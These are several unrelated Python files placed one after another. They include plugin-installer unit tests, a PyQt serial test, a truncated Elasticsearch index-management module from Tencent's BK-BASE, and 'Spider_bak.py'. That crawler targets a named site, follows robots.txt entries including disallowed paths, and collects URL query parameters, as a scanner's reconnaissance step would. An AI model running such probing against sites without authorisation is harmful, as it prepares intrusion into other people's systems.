self.good_plugin_installer = podmodel_installer.PODModelInstaller(self.good_plugin_loc)
self.plugin_reader = zipper.UnZipper(self.good_plugin_loc)
@property
def good_plugin_loc(self):
"""Returns the full path to the known good plugin archive."""
return test_plugin_installer.TestPluginInstaller.local_plugin('good_podmodel.zip')
@property
def badfolders_plugin_loc(self):
"""Returns the full path to a known bad plugin (support folders must
share name of the plugin archive)"""
return test_plugin_installer.TestPluginInstaller.local_plugin('badfolders_podmodel.zip')
@property
def badname_plugin_loc(self):
"""Returns the full path to a known bad plugin (root plugin module
must share the name of the plugin archive)"""
return test_plugin_installer.TestPluginInstaller.local_plugin('badname_podmodel.zip')
@property
def badnomodule_plugin_loc(self):
"""Returns the full path to a known bad plugin (root plugin module
must exist)"""
return test_plugin_installer.TestPluginInstaller.local_plugin('badnomodule_podmodel.zip')
@property
def badreadme_plugin_loc(self):
"""Returns the full path to a known bad plugin (plugin archive must
have a properly-named README file)"""
return test_plugin_installer.TestPluginInstaller.local_plugin('badreadme_podmodel.zip')
@property
def badnoreadme_plugin_loc(self):
"""Returns the full path to a known bad plugin (plugin archive must
have a README file)"""
return test_plugin_installer.TestPluginInstaller.local_plugin('badnoreadme_podmodel.zip')
@property
def badstructure_plugin_loc(self):
"""Returns the full path to a known bad plugin (plugin may only have
a .py module and README file in the root)"""
return test_plugin_installer.TestPluginInstaller.local_plugin('badstructure_podmodel.zip')
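    # Illustrative only: the archive layout that the "good" plugin is expected to follow, pieced
    # together from the property docstrings above (root module and support folder named after the
    # archive, plus a README in the root). The exact README filename is an assumption.
    #
    #   good_podmodel.zip
    #     good_podmodel.py    <- root plugin module, named after the archive
    #     README              <- readme file required in the root
    #     good_podmodel/      <- support folder sharing the archive's name
    #       (support files)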
def test_init(self):
"""Verify correct initialization"""
zip_pword = random.sample(string.ascii_letters, 9)
a_plugin_fetcher = podmodel_installer.PODModelInstaller(self.good_plugin_loc,
zip_password=zip_pword)
self.assertEqual(self.good_plugin_loc, a_plugin_fetcher.plugin_url)
self.assertEqual(zip_pword, a_plugin_fetcher.zip_password)
self.assertIsNone(a_plugin_fetcher.plugin)
self.assertIsNone(a_plugin_fetcher.plugin_contents)
def test_fetch(self):
"""Verify retrieval of the plugin archive"""
a_plugin_fetcher = podmodel_installer.PODModelInstaller(self.good_plugin_loc)
a_plugin_fetcher.fetch()
with open(self.good_plugin_loc, 'rb') as fidin:
local_plugin = fidin.read()
self.assertEqual(local_plugin, a_plugin_fetcher.plugin)
self.assertEqual(cStringIO.StringIO(local_plugin).getvalue(),
a_plugin_fetcher.plugin_contents.getvalue())
def test_verify_plugin_bad_folders(self):
"""Verify that verify_plugin method returns False if the plugin appears invalid due
to improperly-named folders."""
bad_plugin_installer = podmodel_installer.PODModelInstaller(self.badfolders_plugin_loc)
bad_plugin_installer.fetch()
self.assertFalse(bad_plugin_installer.verify_plugin())
def test_verify_plugin_bad_name(self):
"""Verify that verify_plugin method returns False if the plugin appears invalid due
to improperly-named plugin module."""
bad_plugin_installer = podmodel_installer.PODModelInstaller(self.badname_plugin_loc)
bad_plugin_installer.fetch()
self.assertFalse(bad_plugin_installer.verify_plugin())
def test_verify_plugin_bad_module(self):
"""Verify that verify_plugin method returns False if the plugin appears invalid due
to improperly-named plugin module."""
bad_plugin_installer = podmodel_installer.PODModelInstaller(self.badnomodule_plugin_loc)
bad_plugin_installer.fetch()
self.assertFalse(bad_plugin_installer.verify_plugin())
def test_verify_plugin_bad_readme(self):
"""Verify that verify_plugin method returns False if the plugin appears invalid due
to improperly-named README."""
bad_plugin_installer = podmodel_installer.PODModelInstaller(self.badreadme_plugin_loc)
bad_plugin_installer.fetch()
self.assertFalse(bad_plugin_installer.verify_plugin())
def test_verify_plugin_bad_noreadme(self):
"""Verify that verify_plugin method returns False if the plugin appears invalid due
to not having a README file in the root."""
bad_plugin_installer = podmodel_installer.PODModelInstaller(self.badnoreadme_plugin_loc)
bad_plugin_installer.fetch()
self.assertFalse(bad_plugin_installer.verify_plugin())
def test_verify_plugin_bad_structure(self):
"""Verify that verify_plugin method returns False if the plugin appears invalid due
to having an invalid structure (support files in sub-folder; only module.py and
README allowed in root)"""
bad_plugin_installer = podmodel_installer.PODModelInstaller(self.badstructure_plugin_loc)
bad_plugin_installer.fetch()
self.assertFalse(bad_plugin_installer.verify_plugin())
def test_install_plugin(self):
"""Verify install_plugin method correctly installs a plugin; also
verifies handling of encrypted ZIPs"""
sample_plugin_url = TestPODModelInstaller.local_plugin('good_podmodel.zip')
installed_plugin_name = os.path.join(pathfinder.podmodels_path(), 'good_podmodel.py')
installer = podmodel_installer.PODModelInstaller(sample_plugin_url)
installer.fetch()
self.assertTrue(installer.verify_plugin())
install_success = installer.install_plugin()
self.assertTrue(os.path.exists(installed_plugin_name))
self.assertTrue(install_success)
# Clean up - attempt to remove the sample POD Model if it already exists
podmodel_files = zipper.UnZipper(sample_plugin_url).list_contents()
for each_file in podmodel_files:
full_path = os.path.join(pathfinder.podmodels_path(), each_file)
if os.path.exists(full_path):
try:
os.remove(full_path)
except WindowsError: # file in use
return
class TestRemotePODModelInstaller(test_plugin_installer.TestRemotePluginInstaller):
"""Tests the RemotePODModelInstaller class"""
@property
def good_plugin(self):
"""Returns the path and filename to the known good plugin"""
return TestRemotePODModelInstaller.local_plugin('good_podmodel.zip')
@property
def good_plugin_url(self):
"""Returns the URL to the known good plugin"""
return TestRemotePODModelInstaller.plugin_url('good_podmodel.zip')
@property
def badfolders_plugin_url(self):
"""Returns the URL to a known bad plugin (support folders must
share name of the plugin archive)"""
return TestRemotePODModelInstaller.plugin_url('badfolders_podmodel.zip')
@property
def badname_plugin_url(self):
"""Returns the URL to a known bad plugin (root plugin module
must share the name of the plugin archive)"""
return TestRemotePODModelInstaller.plugin_url('badname_podmodel.zip')
@property
def badnomodule_plugin_url(self):
"""Returns the URL to a known bad plugin (root plugin module
must exist)"""
return TestRemotePODModelInstaller.plugin_url('badnomodule_podmodel.zip')
@property
def badreadme_plugin_url(self):
"""Returns the URL to a known bad plugin (plugin archive must
have a properly-named README file)"""
return TestRemotePODModelInstaller.plugin_url('badreadme_podmodel.zip')
@property
def badnoreadme_plugin_url(self):
"""Returns the URL to a known bad plugin (plugin archive must
have a README file)"""
return TestRemotePODModelInstaller.plugin_url('badnoreadme_podmodel.zip')
@property
def badstructure_plugin_url(self):
"""Returns the URL to a known bad plugin (plugin may only have
a .py module and README file in the root)"""
return TestRemotePODModelInstaller.plugin_url('badstructure_podmodel.zip')
def setUp(self):
"""Creates a SimpleHTTPServer instance to handle a single
request. Use self.server_thd.start() to initiate."""
#self.server_thd = threading.Thread(target=TestRemotePluginInstaller.httpd.handle_request)
self.good_plugin_installer = podmodel_installer.RemotePODModelInstaller(self.good_plugin_url)
self.plugin_reader = zipper.UnZipper(self.good_plugin)
def test_init(self):
"""Verify correct initialization"""
uname = random.sample(string.ascii_letters, 7)
pword = random.sample(string.ascii_letters, 11)
zip_pword = random.sample(string.ascii_letters, 9)
a_plugin_fetcher = podmodel_installer.RemotePODModelInstaller(self.good_plugin_url,
username=uname,
password=pword
, zip_password=zip_pword)
self.assertEqual(self.good_plugin_url, a_plugin_fetcher.plugin_url)
self.assertEqual(uname, a_plugin_fetcher.plugin_url_username)
self.assertEqual(pword, a_plugin_fetcher.plugin_url_password)
self.assertEqual(zip_pword, a_plugin_fetcher.zip_password)
self.assertIsNone(a_plugin_fetcher.plugin)
self.assertIsNone(a_plugin_fetcher.plugin_contents)
def test_fetch(self):
"""Verify fetching a plugin"""
self.good_plugin_installer.fetch()
with open(self.good_plugin, 'rb') as fidin:
local_plugin = fidin.read()
self.assertEqual(local_plugin, self.good_plugin_installer.plugin)
self.assertEqual(cStringIO.StringIO(local_plugin).getvalue(),
self.good_plugin_installer.plugin_contents.getvalue())
def test_install_plugin(self):
"""Verify install_plugin method correctly installs a plugin; also
verifies handling of encrypted ZIPs"""
sample_plugin_url = TestRemotePODModelInstaller.plugin_url('good_podmodel.zip')
installed_plugin_name = os.path.join(pathfinder.podmodels_path(), 'good_podmodel.py')
installed_plugin_cfg = os.path.join(pathfinder.podmodels_path(), 'good_podmodel.cfg')
installer = podmodel_installer.RemotePODModelInstaller(sample_plugin_url)
installer.fetch()
self.assertTrue(installer.verify_plugin())
install_success = installer.install_plugin()
self.assertTrue(os.path.exists(installed_plugin_name))
self.assertTrue(os.path.exists(installed_plugin_cfg))
self.assertTrue(install_success)
# Clean up - attempt to remove the sample plugin if it already exists
for mdl_file in [installed_plugin_name, installed_plugin_cfg]:
if os.path.exists(mdl_file):
try:
os.remove(mdl_file)
except WindowsError: # file in use
return
if __name__ == "__main__":
unittest.main()
|
Spider_bak.py
|
import requests
import bs4
import Queue
import re
import threading
class Spider():
def __init__(self):
self.url = None
self._WebRootPage = None
self.UrlList = []
self._ParmList = {}
self._DuplicateUrlList = []
self.Threads = 10
self._Counter = 0
self.Protocol = 'http'
self.queue = Queue.Queue()
def SpiderSite(self):
if self.url:
if not self.Protocol:
print '[!] Protocol not specified, using HTTP by default.'
self.Protocol = 'http'
self._WebRootPage = '%s://%s/' %(self.Protocol, self.url)
else:
            print '[!] Error getting site: URL not specified.'
            return self.UrlList
UrlList = self.GetHomepage()
Robots = self.GetRobots()
for url in Robots:
UrlList.append(url)
print '[+] Fetched %s urls from robots.' %(str(len(Robots)))
UrlList = self.CheckUrlList(UrlList)
self.UrlList = self.LoadPage(UrlList)
while self.queue.qsize():
if self._Counter < self.Threads:
thread = threading.Thread(target=self.GetPage, args=[self.queue.get()])
thread.start()
self._Counter += 1
return self.UrlList
def GetHomepage(self):
try:
resp = requests.get(self._WebRootPage).text
UrlList = self.GetPageUrl(resp)
UrlList = self.CheckUrlList(UrlList)
except Exception, e:
print '[!] Error getting homepage: %s' %(str(e))
UrlList = ''
return UrlList
def GetPageUrl(self, page): # Fetch URL from page, Return List.
UrlList = []
try:
soup = bs4.BeautifulSoup(page)
for item in soup.findAll('a'):
UrlList.append(item.get('href').lstrip('/'))
print '[*] Fetched %s urls.' %(str(len(UrlList)))
except Exception, e:
print '[!] Error fetching url: %s.' %(str(e))
return UrlList
    def CheckUrl(self, url): # Take a URL string, check that it is usable, and return the normalized url (or None).
try:
if re.findall(r'^(?![/]{2}|http[s]?://).*', url):
pass
else:
if re.findall(self.url, url):
url = re.sub('^([/]{2}|http[s]?://)%s' % (self.url.replace('.', '\.')), '', url)
url = url.lstrip('/')
else:
url = None
if url:
if re.findall('\.jpg|\.gif|\.jpeg|\.js|\.pdf|\.doc|\.png|\.bmp|\.css|\.xml|\.xls|\.json|\.ppt|\.psd', url):
url = None
except Exception, e:
print '[!] Error checking url: %s, resuming next' %(str(e))
url = None
return url
def GetPage(self, url): # Fetch page.
try:
resp = requests.get(self._WebRootPage+url).text
UrlList = self.GetPageUrl(resp)
UrlList = self.CheckUrlList(UrlList)
self.LoadPage(UrlList)
except Exception, e:
print '[!] Error getting page: %s' %(str(e))
UrlList = []
self._Counter -= 1
return UrlList
def CheckUrlList(self, UrlList): # Get a literable list, Check availability, Return a list.
NewUrlList = []
for url in UrlList:
url = self.CheckUrl(url)
if url and url != u'#' and url != u'':
NewUrlList.append(url)
return NewUrlList
def LoadPage(self, page): # Load pages without other actions but check duplicate and store into queue and urllist
NewUrlList = []
UrlList = self.CheckDuplicate(page)
for page in UrlList:
self.queue.put(page)
NewUrlList.append(page)
return NewUrlList
def CheckDuplicate(self, list): # Check urls, feed them into duplicate list.
UrlList = []
PageList = []
for url in list:
PageUrl = url.split('?')[0]
if PageUrl not in PageList:
PageList.append(PageUrl)
pass
else:
continue
if url not in self._DuplicateUrlList:
UrlList.append(url)
self._DuplicateUrlList.append(url)
return UrlList
def GetRobots(self):
UrlList = []
try:
            resp = requests.get(self._WebRootPage + 'robots.txt').text
            UrlList = re.findall(r'[Aa]llow: /(.*)', resp)
except Exception, e:
print '[!] Failed to fetch robots: %s' %(str(e))
return UrlList
    def CheckParms(self): # Check spidered URLs, extract their parameters and return them as a dict of the form {url: {param: value}}.
ParmDict = {}
try:
for url in self.UrlList:
                if '?' not in url:
                    continue
                url, parm = url.split('?', 1)
                if not url:
                    url = '/'
                parmList = parm.split('&')
                for parm in parmList:
                    param, _, value = parm.partition('=')
if url not in ParmDict:
ParmDict[url] = {}
                    if param not in ParmDict[url]:
ParmDict[url][param] = value
            print ParmDict
            return ParmDict
except Exception, e:
print '[!] Error checking parameter: %s.' %(e)
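# Illustrative sketch only (not used by Spider): shows the {url: {param: value}} structure that
# CheckParms() above is meant to build from spidered URLs. The sample URLs are made up.
def _demo_parm_dict():
    sample_urls = ['index.php?id=1&cat=2', 'view.php?page=3', 'about.html']
    parm_dict = {}
    for url in sample_urls:
        if '?' not in url:
            continue
        path, query = url.split('?', 1)
        for pair in query.split('&'):
            key, _, value = pair.partition('=')
            parm_dict.setdefault(path or '/', {}).setdefault(key, value)
    # parm_dict == {'index.php': {'id': '1', 'cat': '2'}, 'view.php': {'page': '3'}}
    return parm_dict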
def test():
spider = Spider()
spider.url = 'www.katun.me'
UrlList = spider.SpiderSite()
print '*' + '-' * 30 + '*'
for url in UrlList:
print '[+] Fetched: %s' %(str(url))
|
test_prf.py
|
from PyQt5.QtTest import QTest
from PyQt5.QtCore import Qt
from qttasks.prf import PrettyWidget
from time import sleep
from serial import serial_for_url, SerialException
from pathlib import Path
from struct import unpack
import threading
class SerialThreading(object):
def __init__(self):
self.triggers_log = Path('triggers.log').resolve()
self.port_trigger = serial_for_url('loop://', timeout=0.1)
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
with self.triggers_log.open('wb') as f:
while True:
out = self.port_trigger.read()
if out != b'':
f.write(out)
def notest_prf_exit(qtbot):
tr = SerialThreading()
w = PrettyWidget(port_trigger=tr.port_trigger)
qtbot.addWidget(w)
sleep(1)
qtbot.keyEvent(
QTest.Click,
w,
Qt.Key_Escape,
)
with tr.triggers_log.open('rb') as f:
val = f.read()
assert unpack('<' + len(val) * 'B', val) == (250, 251)
def notest_prf_exit_after_start(qtbot):
tr = SerialThreading()
w = PrettyWidget(port_trigger=tr.port_trigger)
qtbot.addWidget(w)
qtbot.keyEvent(
QTest.Click,
w,
Qt.Key_Enter,
)
w.start()
sleep(5)
w.check_time()
sleep(5)
qtbot.keyEvent(
QTest.Click,
w,
Qt.Key_Escape,
)
sleep(2)
with tr.triggers_log.open('rb') as f:
val = f.read()
assert unpack('<' + len(val) * 'B', val) == (250, 251)
|
es.py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-BASE 蓝鲸基础平台 is licensed under the MIT License.
License for BK-BASE 蓝鲸基础平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import json
import re
import threading
import time
import requests
from common.base_crypt import BaseCrypt
from common.log import logger
from datahub.common.const import (
ACTIONS,
ADD,
ALIAS,
ALLOCATION,
ANALYZED_FIELDS,
CLUSTER_NAME,
CLUSTER_TYPE,
CONNECTION_INFO,
DATE,
DATE_FIELDS,
DOC_VALUES,
DOC_VALUES_FIELDS,
DOUBLE,
DTEVENTTIME,
DTEVENTTIMESTAMP,
ENABLE_REPLICA,
ES,
ES_CONF,
ES_FIELDS,
EXPIRES,
FAILED,
FALSE,
FIELD_NAME,
FIELD_TYPE,
FIELDS,
FLOAT,
HAS_REPLICA,
HOST,
INCLUDE,
INCLUDE_IN_ALL,
INDEX,
INDICES,
INFO,
INT,
INTEGER,
JSON_FIELDS,
JSON_HEADERS,
KEYWORD,
LONG,
MAPPINGS,
NUMBER_OF_REPLICAS,
OBJECT,
ORDER,
PASSWORD,
PORT,
PROPERTIES,
REMOVE,
RESULT_TABLE_ID,
RESULT_TABLE_NAME,
ROUTING,
RT_CONF,
RT_FIELDS,
SAMPLE,
SETTINGS,
STATUS,
STORAGE_CLUSTER,
STORAGE_CONFIG,
STORAGES,
STORE_SIZE,
STRING,
SUCCESS,
TAG,
TEXT,
TOP,
TRUE,
TYPE,
USER,
VERSION,
)
from datahub.storekit import model_manager, util
from datahub.storekit.exceptions import (
ClusterNotFoundException,
EsBadIndexError,
EsRestRequestError,
RtStorageNotExistsError,
)
from datahub.storekit.settings import (
AUTO_CREATE_FIELD,
DOCS_LIMIT_PER_SHARD,
ES_MAINTAIN_TIMEOUT,
EXCLUDE_ES_CLUSTER,
FORCE_SPLIT_DAYS,
HAS_COLD_NODES,
HOT_INDEX_SAVE_DAYS,
HTTP_REQUEST_TIMEOUT,
INDEX_SPLIT_THRESHOLD_IN_BYTE,
INITIAL_SHARD_MAX_SIZE_IN_BYTE,
INITIAL_SHARD_NUM,
MAX_SHARD_NUM,
NODE_HAS_TAG,
REPLICA_NUM,
RESERVED_INDEX_NUM,
RTX_RECEIVER,
RUN_VERSION,
SKIP_ES_INDEX_PREFIX,
SKIP_RT_FIELDS,
TAG_COLD,
TAG_HOT,
TOTAL_SHARDS_PER_NODE,
VERSION_IEOD_NAME,
)
def initialize(rt_info):
"""
初始化rt的es存储,包含创建索引、生成alias等操作
:param rt_info: rt的字段和配置信息
:return: 初始化操作结果
"""
return prepare(rt_info)
def info(rt_info):
"""
获取rt的es存储相关信息,包含索引列表、别名列表等信息
:param rt_info: rt的字段和配置信息
:return: rt的es相关信息
"""
es = rt_info[STORAGES][ES]
es[INFO] = {INDICES: [], MAPPINGS: {}, SETTINGS: {}, SAMPLE: {}}
rt_id_lower = rt_info[RESULT_TABLE_ID].lower()
    # fetch the index list and the mapping of the latest index
es_addr, es_auth = parse_es_connection_info(rt_info[STORAGES][ES][STORAGE_CLUSTER][CONNECTION_INFO])
    # indices for an rt are named rt_id + _ + yyyyMMdd + a two-digit sequence number from 00 to 99
    indices = _get_es_indices(es_addr, es_auth, rt_id_lower) # index names in ES must be lowercase
valid_rt_indices, _ = _get_valid_rt_indices(indices)
if rt_id_lower in valid_rt_indices:
es[INFO][INDICES] = valid_rt_indices[rt_id_lower]
max_index_name = valid_rt_indices[rt_id_lower][0]
es[INFO][MAPPINGS] = _get_index_mapping_from_es(es_addr, es_auth, max_index_name)
es[INFO][SETTINGS] = _get_index_settings_from_es(es_addr, es_auth, max_index_name)
es[INFO][SAMPLE] = _get_sample_data_from_es(es_addr, es_auth, max_index_name)
return es
def alter(rt_info):
"""
修改rt的es存储相关信息,有可能需要创建新的索引,以及别名指向
:param rt_info: rt的字段和配置信息
:return: rt的es存储的变更结果
"""
return prepare(rt_info)
def delete(rt_info):
"""
删除rt的es存储相关配置,以及对应的索引和数据
:param rt_info: rt的字段和配置信息
:return: rt的es存储清理结果
"""
rt_id_lower = rt_info[RESULT_TABLE_ID].lower()
es_addr, es_auth = parse_es_connection_info(rt_info[STORAGES][ES][STORAGE_CLUSTER][CONNECTION_INFO])
    # indices for an rt are named rt_id + _ + yyyyMMdd + a two-digit sequence number from 00 to 99
    indices = _get_es_indices(es_addr, es_auth, rt_id_lower) # index names in ES must be lowercase
valid_rt_indices, _ = _get_valid_rt_indices(indices)
if rt_id_lower in valid_rt_indices:
logger.info(f"{es_addr}: going to delete indices {valid_rt_indices[rt_id_lower]}")
_delete_index(es_addr, es_auth, ",".join(valid_rt_indices[rt_id_lower]))
return True
def prepare(rt_info, force_create=False, force_shard_num=INITIAL_SHARD_NUM):
"""
准备rt的es存储,这里可能是初始化,或者schema变化后的创建,或者不需要做任何事情
:param force_shard_num: 强制分裂时指定分片数
:param rt_info: rt的字段和配置信息
:param force_create: 强制创建新索引
:return: rt的es存储准备的结果
"""
    # look up the ES cluster information
rt_id_lower = rt_info[RESULT_TABLE_ID].lower()
conn_info = rt_info[STORAGES][ES][STORAGE_CLUSTER][CONNECTION_INFO]
es_addr, es_auth = parse_es_connection_info(conn_info)
    # indices for an rt are named rt_id + _ + yyyyMMdd + a two-digit sequence number from 00 to 99
    indices = _get_es_indices(es_addr, es_auth, rt_id_lower) # index names in ES must be lowercase
valid_rt_indices, _ = _get_valid_rt_indices(indices)
    new_index_name = _get_new_index_name(rt_id_lower) # default name for a newly created index
shard, init_shard_size, max_shard_num, shard_docs_limit, total_shards_per_node = _get_init_shard_param(
conn_info
    ) # start with the minimum shard count by default
    need_create_index = False # by default no new index is needed
if rt_id_lower in indices:
        # invalid index name; the administrators must be notified to handle this case manually
msg = f"{es_addr}: unable to create index for {rt_id_lower} as index name is the same as alias"
logger.warning(msg)
util.wechat_msg(RTX_RECEIVER, msg)
raise EsBadIndexError(message_kv={"msg": rt_id_lower})
elif rt_id_lower in valid_rt_indices:
        # the rt already has an index; compare schemas and create a new index if the schema changed
max_index_name = valid_rt_indices[rt_id_lower][0]
json_mapping = _get_index_mapping_from_es(es_addr, es_auth, max_index_name)
logger.info(f"{es_addr}: {rt_id_lower} mapping in {max_index_name} is {json.dumps(json_mapping)}")
new_index_name = _get_new_index_name(rt_id_lower, max_index_name)
current_replica = _get_index_replica(es_addr, es_auth, max_index_name)
if _is_schema_changed(rt_info, json_mapping) or _is_replica_changed(rt_info, current_replica):
need_create_index = True
index_size = _get_index_size(es_addr, es_auth, max_index_name)
shard = shard if index_size < init_shard_size else max_shard_num
else:
logger.info(f"{es_addr}: schema unchanged for {rt_id_lower}, use {max_index_name}")
else:
        need_create_index = True # no index exists yet for the rt, so one must be created
if need_create_index or force_create:
shard = force_shard_num if force_create else shard
mapping = _construct_mapping(rt_info, shard, TAG_HOT, total_shards_per_node)
logger.info(f"{es_addr}: {rt_id_lower} create index {new_index_name} with mapping {mapping}")
return _create_es_index_in_cluster(rt_id_lower, es_addr, es_auth, new_index_name, mapping)
return True
def check_schema(rt_info):
"""
对比rt的schema和es中索引的schema,找出不一致的地方。rt字段类型有int/long/double/string,
es中有text/keyword/integer/long/double/object等
:param rt_info: rt的配置信息
:return: schema不一致的地方
"""
result = {RT_CONF: {}, RT_FIELDS: {}, ES_CONF: {}, ES_FIELDS: {}}
    # look up the ES cluster information
rt_id_lower = rt_info[RESULT_TABLE_ID].lower()
es_addr, es_auth = parse_es_connection_info(rt_info[STORAGES][ES][STORAGE_CLUSTER][CONNECTION_INFO])
result[RT_CONF] = _trans_fields_to_es_conf(rt_info[FIELDS], json.loads(rt_info[STORAGES][ES][STORAGE_CONFIG]))
for field in rt_info[FIELDS]:
result[RT_FIELDS][field[FIELD_NAME]] = field[FIELD_TYPE]
    # indices for an rt are named rt_id + _ + yyyyMMdd + a two-digit sequence number from 00 to 99
    indices = _get_es_indices(es_addr, es_auth, rt_id_lower) # index names in ES must be lowercase
valid_rt_indices, _ = _get_valid_rt_indices(indices)
if rt_id_lower in valid_rt_indices:
max_index_name = valid_rt_indices[rt_id_lower][0]
json_mapping = _get_index_mapping_from_es(es_addr, es_auth, max_index_name)
version = rt_info[STORAGES][ES][STORAGE_CLUSTER][VERSION]
        index_type = rt_info[RESULT_TABLE_NAME].lower() # index_type is the rt's result_table_name field
properties = json_mapping if _extract_big_version(version) >= 7 else json_mapping[index_type]
result[ES_CONF] = _trans_mapping_to_es_conf(properties, version)
field_props = properties[PROPERTIES]
for field in field_props:
result[ES_FIELDS][field] = field_props[field][TYPE]
return result
def maintain(rt_info):
"""
维护rt的es存储,按照规则新建es的索引,对索引增加别名,切换别名指向等等。
:param rt_info: rt的字段和配置信息
:return: 维护rt的es存储的结果
"""
rt_id_lower = rt_info[RESULT_TABLE_ID].lower()
es_addr, es_auth = parse_es_connection_info(rt_info[STORAGES][ES][STORAGE_CLUSTER][CONNECTION_INFO])
    # indices for an rt are named rt_id + _ + yyyyMMdd + a two-digit sequence number from 00 to 99
    indices = _get_es_indices(es_addr, es_auth, rt_id_lower) # index names in ES must be lowercase
valid_rt_indices, _ = _get_valid_rt_indices(indices)
if rt_id_lower in valid_rt_indices:
_maintain_rt_indices(rt_info, valid_rt_indices[rt_id_lower], es_addr, es_auth)
return True
def maintain_all_rts():
"""
维护系统中所有rt的es存储
:return: 维护所有rt的es存储的结果
"""
    # get all ES clusters, excluding clusters that do not hold user data
es_clusters = model_manager.get_cluster_objs_by_type(ES)
    # run per-cluster maintenance concurrently to speed things up; in production the first run of the day creates many indices and takes about 2 hours
check_threads = []
for es_cluster in es_clusters:
if es_cluster.cluster_name in EXCLUDE_ES_CLUSTER:
            continue # skip ES clusters that do not hold user data
        # get the connection info of this ES cluster
es_addr, es_auth = parse_es_connection_info(es_cluster.connection_info)
check_cluster_thread = threading.Thread(
target=_maintain_es_cluster, name=es_cluster.cluster_name, args=(es_cluster.cluster_name, es_addr, es_auth)
)
        # mark the thread as a daemon so it dies together with the main thread
check_cluster_thread.setDaemon(True)
check_threads.append(check_cluster_thread)
check_cluster_thread.start()
    # join all threads and wait for every cluster check to finish
    # use a timeout so a misbehaving cluster cannot block forever and delay later maintenance tasks
for th in check_threads:
th.join(timeout=ES_MAINTAIN_TIMEOUT)
return True
def clusters():
"""
获取es存储集群列表
:return: es存储集群列表
"""
result = model_manager.get_storage_cluster_configs_by_type(ES)
return result
def get_cluster_info(es_addr, es_auth):
"""
获取es索引的settings设置
:param es_addr: es集群地址
:param es_auth: es鉴权信息
:return: es集群信息
"""
res = requests.get(f"http://{es_addr}/_cluster/stats", auth=es_auth, timeout=HTTP_REQUEST_TIMEOUT)
if res.status_code == 200:
return res.json()
else:
logger.warning(f"{es_addr}: get es cluster info failed. {res.status_code} {res.text}")
raise EsRestRequestError(message_kv={"msg": res.text})
def parse_es_connection_info(connection_info):
"""
解析es集群的连接串,将es集群地址和鉴权信息返回
:param connection_info: es集群的连接串配置
:return: 元组,包含es集群地址和鉴权信息。
"""
es_conn = json.loads(connection_info)
es_addr = f"{es_conn[HOST]}:{es_conn[PORT]}"
if es_conn["enable_auth"]:
es_conn[PASSWORD] = BaseCrypt.bk_crypt().decrypt(es_conn[PASSWORD])
es_auth = (es_conn[USER], es_conn[PASSWORD])
return es_addr, es_auth
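# Illustrative example (added, not part of the original module): parse_es_connection_info() expects
# connection_info to be a JSON string shaped roughly like the following -- the exact key names come
# from the cluster registration and the values here are made up:
#
#   {"host": "es.example.com", "port": 9200, "enable_auth": true,
#    "user": "bkdata", "password": "<encrypted>"}
#
# It would then return ("es.example.com:9200", ("bkdata", "<decrypted password>")).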
def _get_init_shard_param(connection_info):
"""
解析es集群的连接串,将es集群的初始shard数返回
:param connection_info: es集群的连接串配置
:return: 初始shard数。
"""
es_conn = json.loads(connection_info)
init_shard_num = es_conn.get("init_shard_num", INITIAL_SHARD_NUM)
init_shard_size = es_conn.get("init_shard_size", INITIAL_SHARD_MAX_SIZE_IN_BYTE)
max_shard_num = es_conn.get("max_shard_num", MAX_SHARD_NUM)
shard_docs_limit = (
es_conn["shard_docs_limit"]
if ("shard_docs_limit" in es_conn and es_conn["shard_docs_limit"] < DOCS_LIMIT_PER_SHARD)
else DOCS_LIMIT_PER_SHARD
)
total_shards_per_node = es_conn.get("total_shards_per_node", TOTAL_SHARDS_PER_NODE)
return init_shard_num, init_shard_size, max_shard_num, shard_docs_limit, total_shards_per_node
def _get_hot_save_days(connection_info):
"""
解析es集群的连接串,将es集群的热索引保留天数返回
:param connection_info: es集群的连接串配置
:return: 热索引保留天数。
"""
es_conn = json.loads(connection_info)
hot_save_days = es_conn["hot_save_days"] if "hot_save_days" in es_conn else HOT_INDEX_SAVE_DAYS
return hot_save_days
def _get_has_cold_nodes(connection_info):
"""
解析es集群的连接串,获取集群是否有冷节点
:param connection_info: es集群的连接串配置
:return: 集群是否有冷节点。
"""
es_conn = json.loads(connection_info)
has_cold_nodes = es_conn.get("has_cold_nodes", HAS_COLD_NODES)
return has_cold_nodes
def _get_split_index_condition(connection_info):
"""
解析es集群的连接串,将es集群的index分裂条件返回
:param connection_info: es集群的连接串配置
:return: 索引的分裂条件。
"""
es_conn = json.loads(connection_info)
index_split_threshold_in_byte = (
es_conn["index_split_threshold_in_byte"]
if "index_split_threshold_in_byte" in es_conn
else INDEX_SPLIT_THRESHOLD_IN_BYTE
)
force_split_days = es_conn["force_split_days"] if "force_split_days" in es_conn else FORCE_SPLIT_DAYS
return index_split_threshold_in_byte, force_split_days
def _maintain_es_cluster(es_cluster_name, es_addr, es_auth):
"""
维护指定的es集群中的索引列表
:param es_cluster_name: es集群名称
:param es_addr: es集群地址
:param es_auth: es鉴权信息
"""
# 获取es集群中的索引列表
indices = _get_es_indices(es_addr, es_auth)
valid_rt_indices, bad_indices = _get_valid_rt_indices(indices)
if bad_indices:
logger.info(f"{es_addr}: bad indices {json.dumps(bad_indices)}")
maintain_failed = []
    # maintain one rt at a time, checking that the rt still has ES storage and that its cluster has not been switched
logger.info(f"{es_addr}: es maintain started for {es_cluster_name}")
for rt_id_lower, sort_index_list in list(valid_rt_indices.items()):
try:
rt_info = util.get_rt_info(rt_id_lower)
